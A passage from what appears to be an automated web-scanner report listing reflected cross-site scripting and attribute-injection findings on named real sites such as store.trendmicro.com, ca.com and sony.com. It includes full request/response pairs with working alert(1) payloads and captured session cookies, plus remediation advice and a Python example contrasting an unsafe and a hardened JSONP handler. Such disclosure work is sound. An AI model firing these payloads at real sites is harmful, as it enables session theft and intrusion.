Cookie: ORA_WX_SESSION="10.2.2.129:260-0#0"; JSESSIONID=74CA66C6686E81F96F871B79152A151D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6; BIGipServerp-drh-dc2pod9-pool1-active=2164392458.260.0000; __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%22%2C%22r%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Ftrend-micro-researchers-identify-vulnerability-in-hotmail%2F%22%2C%22t%22%3A1315351267113%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fcategory%2Fpharming%2F%22%2C%22l%22%3A%22Pharming%22%2C%22de%22%3A%7B%22su%22%3A%22Malware%20blog%20by%20TrendLabs%20provides%20internet%20security%20research%20information%20on%20worms%20viruses%20trojans%20adware%20and%20other%20internet%20threats%20and%20discusses%20how%20to%20protect%20your%20computer%20data%20from%20being%20hijacked%22%2C%22ti%22%3A%22Malware%20Blog%20%7C%20TrendLabs%20-%20by%20Trend%20Micro%22%2C%22nw%22%3A1544%2C%22nl%22%3A162%7D%7D

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=97065992664,0)
Date: Tue, 06 Sep 2011 18:24:32 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app94
Content-Length: 56872


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<input type="radio" name="paymentMethodID" value="-12c3e0"><script>alert(1)</script>44993469a8dc0473c" onclick="dispPaymentOption(this.id);dispHandle('autoBill');" id="CreditCardMethod">
...[SNIP]...

1.33. https://store.trendmicro.com/DRHM/store [paymentMethodID%24%2452525 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://store.trendmicro.com
Path:   /DRHM/store

Issue detail

The value of the paymentMethodID%24%2452525 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2d18"><script>alert(1)</script>7d2d858457eeab20b was submitted in the paymentMethodID%24%2452525 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; it was possible to convert it to a GET request, which makes the attack easier to demonstrate and to deliver (for example as a link or image URL).

Request

GET /DRHM/store?Action=PostCheckoutPaymentPage&SiteID=tmamer&Locale=en_US&Form=com.digitalriver.template.form.CheckoutPaymentForm&CallingPageID=CheckoutPaymentAnonymousPage&Env=BASE&ORIG_VALUE_verazipInvalidAddress=&verazipInvalidAddress=&ORIG_VALUE_operation=update&operation=update&ORIG_VALUE_mode=anonymous&mode=anonymous&ORIG_VALUE_name1=&name1=&ORIG_VALUE_name2=&name2=&ORIG_VALUE_companyName=&companyName=&ORIG_VALUE_line1=&line1=&ORIG_VALUE_line2=&line2=&ORIG_VALUE_city=&city=&ORIG_VALUE_postalCode=&postalCode=&ORIG_VALUE_state=&state=&ORIG_VALUE_country=&country=&ORIG_VALUE_phoneNumber=&phoneNumber=&ORIG_VALUE_EMAILemail=&EMAILemail=&ORIG_VALUE_EMAILconfirmEmail=&EMAILconfirmEmail=&CLS_DATA_ANALYTICS=WO%3D300%26SO%3D300%26CO%3D300%26DST%3Dfalse&ORIG_VALUE_paymentMethodID%24%2452525=190000&paymentMethodID%24%2452525=190000e2d18"><script>alert(1)</script>7d2d858457eeab20b&ORIG_VALUE_name%24%2452525=PayPalExpress&name%24%2452525=PayPalExpress&ORIG_VALUE_paymentMethodID%24%2452524=-1&paymentMethodID%24%2452524=-1&ORIG_VALUE_name%24%2452524=CreditCardMethod&name%24%2452524=CreditCardMethod&ORIG_VALUE_paymentMethodID=-1&paymentMethodID=-1&ORIG_VALUE_cardNumber=&cardNumber=&ORIG_VALUE_cardExpirationMonth=&cardExpirationMonth=&ORIG_VALUE_cardExpirationYear=&cardExpirationYear=&ORIG_VALUE_cardSecurityCode=&cardSecurityCode=&saveMyCcEnabled=false&ORIG_VALUE_saveMyCc=on&saveMyCc=on&ORIG_VALUE_optIn=off&x=27&y=13 HTTP/1.1
Host: store.trendmicro.com
Connection: keep-alive
Referer: https://store.trendmicro.com/DRHM/store?Action=DisplayCheckoutPaymentPage&SiteID=tmamer&Locale=en_US
Cache-Control: max-age=0
Origin: https://store.trendmicro.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORA_WX_SESSION="10.2.2.129:260-0#0"; JSESSIONID=74CA66C6686E81F96F871B79152A151D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6; BIGipServerp-drh-dc2pod9-pool1-active=2164392458.260.0000; __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%22%2C%22r%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Ftrend-micro-researchers-identify-vulnerability-in-hotmail%2F%22%2C%22t%22%3A1315351267113%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fcategory%2Fpharming%2F%22%2C%22l%22%3A%22Pharming%22%2C%22de%22%3A%7B%22su%22%3A%22Malware%20blog%20by%20TrendLabs%20provides%20internet%20security%20research%20information%20on%20worms%20viruses%20trojans%20adware%20and%20other%20internet%20threats%20and%20discusses%20how%20to%20protect%20your%20computer%20data%20from%20being%20hijacked%22%2C%22ti%22%3A%22Malware%20Blog%20%7C%20TrendLabs%20-%20by%20Trend%20Micro%22%2C%22nw%22%3A1544%2C%22nl%22%3A162%7D%7D

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=97065978905,0)
Date: Tue, 06 Sep 2011 18:24:19 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app94
Content-Length: 56957


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<input type="radio" name="paymentMethodID" value="190000e2d18"><script>alert(1)</script>7d2d858457eeab20b" onclick="dispPaymentOption(this.id);dispHandle('autoHide')" id="PayPalExpress">
...[SNIP]...

1.34. http://wd.sharethis.com/api/getCount2.php [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /api/getCount2.php

Issue detail

The value of the cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b4556%3balert(1)//83e614a352a was submitted in the cb parameter. This input was echoed as b4556;alert(1)//83e614a352a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Here cb is a JSONP callback name, so it should be validated against a strict identifier pattern rather than encoded, and the response should be served as application/javascript with X-Content-Type-Options: nosniff; as captured it is labelled text/html, so a crafted cb is rendered as an HTML document when the URL is opened directly.

Request

GET /api/getCount2.php?cb=stButtons.processCBb4556%3balert(1)//83e614a352a&url=http%3A%2F%2Fwww.javaworld.com%2Fjavaworld%2Fjw-10-2007%2Fjw-10-acegi2.html HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==; __uset=yes

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Tue, 06 Sep 2011 17:46:04 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 297

(function(){stButtons.processCBb4556;alert(1)//83e614a352a({"url":"http:\/\/www.javaworld.com\/javaworld\/jw-10-2007\/jw-10-acegi2.html","email":5,"wordpress":1,"slashdot":2,"twitter":1,"stumbleupon":1,"total":10,"ourl":"http:\/\/www.javaworld.com\/javaworld\
...[SNIP]...
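
The endpoint above is a JSONP API: cb is used as the name of the callback function the client script expects (stButtons.processCB), so it is an identifier by design and output encoding is the wrong tool; the fix is to allow-list it. The Python below is an added example, not ShareThis's code, showing the vulnerable concatenation beside a hardened handler. The response dicts stand in for an HTTP framework, and the share-count data is constructed to resemble the body in the response above.

```python
import json
import re

# A JavaScript identifier, optionally dotted (stButtons.processCB), and nothing else.
CALLBACK_RE = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*$")
MAX_CALLBACK_LEN = 64


def jsonp_unsafe(cb: str, data: dict) -> dict:
    """Mirrors the behaviour seen in 1.34: the callback name is concatenated verbatim
    and the JavaScript is labelled text/html."""
    body = "(function(){" + cb + "(" + json.dumps(data) + ")})()"
    return {"status": 200, "headers": {"Content-Type": "text/html"}, "body": body}


def jsonp_safe(cb: str, data: dict) -> dict:
    """Allow-list the callback, escape HTML-significant characters inside the JSON,
    serve the result as JavaScript and forbid MIME sniffing."""
    if len(cb) > MAX_CALLBACK_LEN or not CALLBACK_RE.match(cb):
        return {"status": 400, "headers": {"Content-Type": "text/plain"},
                "body": "invalid callback"}
    payload = (json.dumps(data)
               .replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026"))
    # The leading comment, a convention used by large JSONP providers, stops the
    # caller-chosen name from forming the first bytes of the response, which the
    # Rosetta Flash technique abused to have JSONP output parsed as a SWF file.
    body = "/**/" + cb + "(" + payload + ");"
    return {"status": 200,
            "headers": {"Content-Type": "application/javascript; charset=utf-8",
                        "X-Content-Type-Options": "nosniff"},
            "body": body}


# Constructed share-count payload shaped like the one in the 1.34 response.
SAMPLE_COUNTS = {"url": "http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html",
                 "email": 5, "twitter": 1, "total": 10}
# The callback value from the request above.
INJECTED_CB = "stButtons.processCBb4556;alert(1)//83e614a352a"

if __name__ == "__main__":
    print(jsonp_unsafe(INJECTED_CB, SAMPLE_COUNTS)["body"])
    print(jsonp_safe(INJECTED_CB, SAMPLE_COUNTS))
    print(jsonp_safe("stButtons.processCB", SAMPLE_COUNTS)["body"])
```

Rejecting rather than sanitising the callback is deliberate: any attempt to strip characters from cb leaves room for encoding tricks, whereas a regular expression over the whole value has no such edge. The length cap is an assumption; pick whatever fits the client's real callback names.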

1.35. http://webconnect.sendouts.com/candidate/my-profile.aspx [Group parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://webconnect.sendouts.com
Path:   /candidate/my-profile.aspx

Issue detail

The value of the Group request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 35f67'%20a%3db%200611e0106fd was submitted in the Group parameter. This input was echoed as 35f67' a=b 0611e0106fd in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Here the value is written into the href of a stylesheet link as the file name WebConnectCss/<Group>.css, so it is both a path segment and an attribute value; restricting Group to an allow-list of letters and digits removes the issue regardless of how the output is encoded.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /candidate/my-profile.aspx?ID=cfs&SiteID=WebConnect&Group=cfs35f67'%20a%3db%200611e0106fd&Key=CN&CnId= HTTP/1.1
Host: webconnect.sendouts.com
Proxy-Connection: keep-alive
Referer: http://webconnect.sendouts.com/CN_main.aspx?key=cn&id=cfs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=2zmfb345apwujmfqifpo5b55

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR ADMa OUR UNRa NOR", policyref="w3c/p3p.xml"
Date: Tue, 06 Sep 2011 20:33:52 GMT
Content-Length: 6843


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>LogIn</title
...[SNIP]...
<link href='WebConnectCss/cfs35f67' a=b 0611e0106fd.css' type="text/css" rel="stylesheet" />
...[SNIP]...

1.36. http://webconnect.sendouts.com/forgot-login.aspx [Group parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://webconnect.sendouts.com
Path:   /forgot-login.aspx

Issue detail

The value of the Group request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bb325'%20a%3db%208528d690379 was submitted in the Group parameter. This input was echoed as bb325' a=b 8528d690379 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /forgot-login.aspx?ID=cfs&SiteID=WebConnect&Group=cfsbb325'%20a%3db%208528d690379&Key=CN&CnId= HTTP/1.1
Host: webconnect.sendouts.com
Proxy-Connection: keep-alive
Referer: http://webconnect.sendouts.com/login.aspx?ReturnUrl=%2fcandidate%2fmy-profile.aspx%3fID%3dcfs%26SiteID%3dWebConnect%26Group%3dcfs%26Key%3dCN%26CnId%3d&ID=cfs&SiteID=WebConnect&Group=cfs&Key=CN&CnId=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=2zmfb345apwujmfqifpo5b55

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR ADMa OUR UNRa NOR", policyref="w3c/p3p.xml"
Date: Tue, 06 Sep 2011 20:34:07 GMT
Content-Length: 4051


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<HTML>
<HEAD>
       <title>Get My Login Information</title>
       <meta name
...[SNIP]...
<LINK href='WebConnectCss/cfsbb325' a=b 8528d690379.css' type="text/css" rel="stylesheet">
...[SNIP]...

1.37. http://webconnect.sendouts.com/job-search.aspx [Group parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://webconnect.sendouts.com
Path:   /job-search.aspx

Issue detail

The value of the Group request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ff9f0'%20a%3db%20f4c3c17ad5d was submitted in the Group parameter. This input was echoed as ff9f0' a=b f4c3c17ad5d in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /job-search.aspx?ID=cfs&SiteID=WebConnect&Group=cfsff9f0'%20a%3db%20f4c3c17ad5d&Key=CN&CnId= HTTP/1.1
Host: webconnect.sendouts.com
Proxy-Connection: keep-alive
Referer: http://webconnect.sendouts.com/CN_main.aspx?key=cn&id=cfs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=2zmfb345apwujmfqifpo5b55

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR ADMa OUR UNRa NOR", policyref="w3c/p3p.xml"
Date: Tue, 06 Sep 2011 20:33:46 GMT
Content-Length: 9877


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>Search Open
...[SNIP]...
<link href='WebConnectCss/cfsff9f0' a=b f4c3c17ad5d.css' type="text/css" rel="stylesheet"/>
...[SNIP]...

1.38. http://webconnect.sendouts.com/login.aspx [Group parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://webconnect.sendouts.com
Path:   /login.aspx

Issue detail

The value of the Group request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c1431'%20a%3db%20645a5e00b99 was submitted in the Group parameter. This input was echoed as c1431' a=b 645a5e00b99 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /login.aspx?ReturnUrl=%2fcandidate%2fmy-profile.aspx%3fID%3dcfs%26SiteID%3dWebConnect%26Group%3dcfs%26Key%3dCN%26CnId%3d&ID=cfs&SiteID=WebConnect&Group=cfsc1431'%20a%3db%20645a5e00b99&Key=CN&CnId= HTTP/1.1
Host: webconnect.sendouts.com
Proxy-Connection: keep-alive
Referer: http://webconnect.sendouts.com/CN_main.aspx?key=cn&id=cfs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=2zmfb345apwujmfqifpo5b55

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR ADMa OUR UNRa NOR", policyref="w3c/p3p.xml"
Date: Tue, 06 Sep 2011 20:34:17 GMT
Content-Length: 6809


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>LogIn</title
...[SNIP]...
<link href='WebConnectCss/cfsc1431' a=b 645a5e00b99.css' type="text/css" rel="stylesheet" />
...[SNIP]...

1.39. https://www.ca.com/us/register/login.aspx [returnURL parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ca.com
Path:   /us/register/login.aspx

Issue detail

The value of the returnURL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ece79"><script>alert(1)</script>39e531be28d was submitted in the returnURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/register/login.aspx?returnURL=/us/default.aspxece79"><script>alert(1)</script>39e531be28d HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: http://www.ca.com/us/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351389192:ss=1315351389192; bn_u=6923713924586392201

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:26:23 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 18:26:23 GMT
Content-Length: 35970


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<meta htt
...[SNIP]...
<a href="http://www.ca.com/us/register/createprofile.aspx?returnURL=/us/default.aspxece79"><script>alert(1)</script>39e531be28d" id="hrefRegisterNow" style="background-color:#0084c9; padding:4px 4px 4px 4px; text-decoration:none;color:#FFFFFF" target="_blank">
...[SNIP]...

1.40. http://www.javalobby.org/articles/acegisecurity/part1.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.javalobby.org
Path:   /articles/acegisecurity/part1.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f89f"><script>alert(1)</script>75a3249fbe5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/acegisecurity/part1.jsp?8f89f"><script>alert(1)</script>75a3249fbe5=1 HTTP/1.1
Host: www.javalobby.org
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=acegisecurity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Resin/3.2.1
Content-Type: text/html; charset=ISO-8859-1
Date: Tue, 06 Sep 2011 17:55:39 GMT
Content-Length: 33612


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
   <head>

       <title>Securing Your Java Applications - Acegi Security Style</title>
<meta http-equiv="content-type"
...[SNIP]...
<input type="hidden" name="successURL" id="successURL01" value="http://www.javalobby.org/articles/acegisecurity/part1.jsp?8f89f"><script>alert(1)</script>75a3249fbe5=1" />
...[SNIP]...

1.41. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [cmd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kb.sony.com
Path:   /selfservice/common/viewdocument_forFrameset_Header.jsp

Issue detail

The value of the cmd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91bbd"-alert(1)-"f87f5c47280 was submitted in the cmd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /selfservice/common/viewdocument_forFrameset_Header.jsp?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC91bbd"-alert(1)-"f87f5c47280&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294 HTTP/1.1
Host: www.kb.sony.com
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=http--supportmicrosoftcom-kb-188175&sliceId=&docTypeID=DT_MICROSOFTKB_1_1&dialogID=328792985&stateId=1%200%20328800294
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FF275CC3415E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; 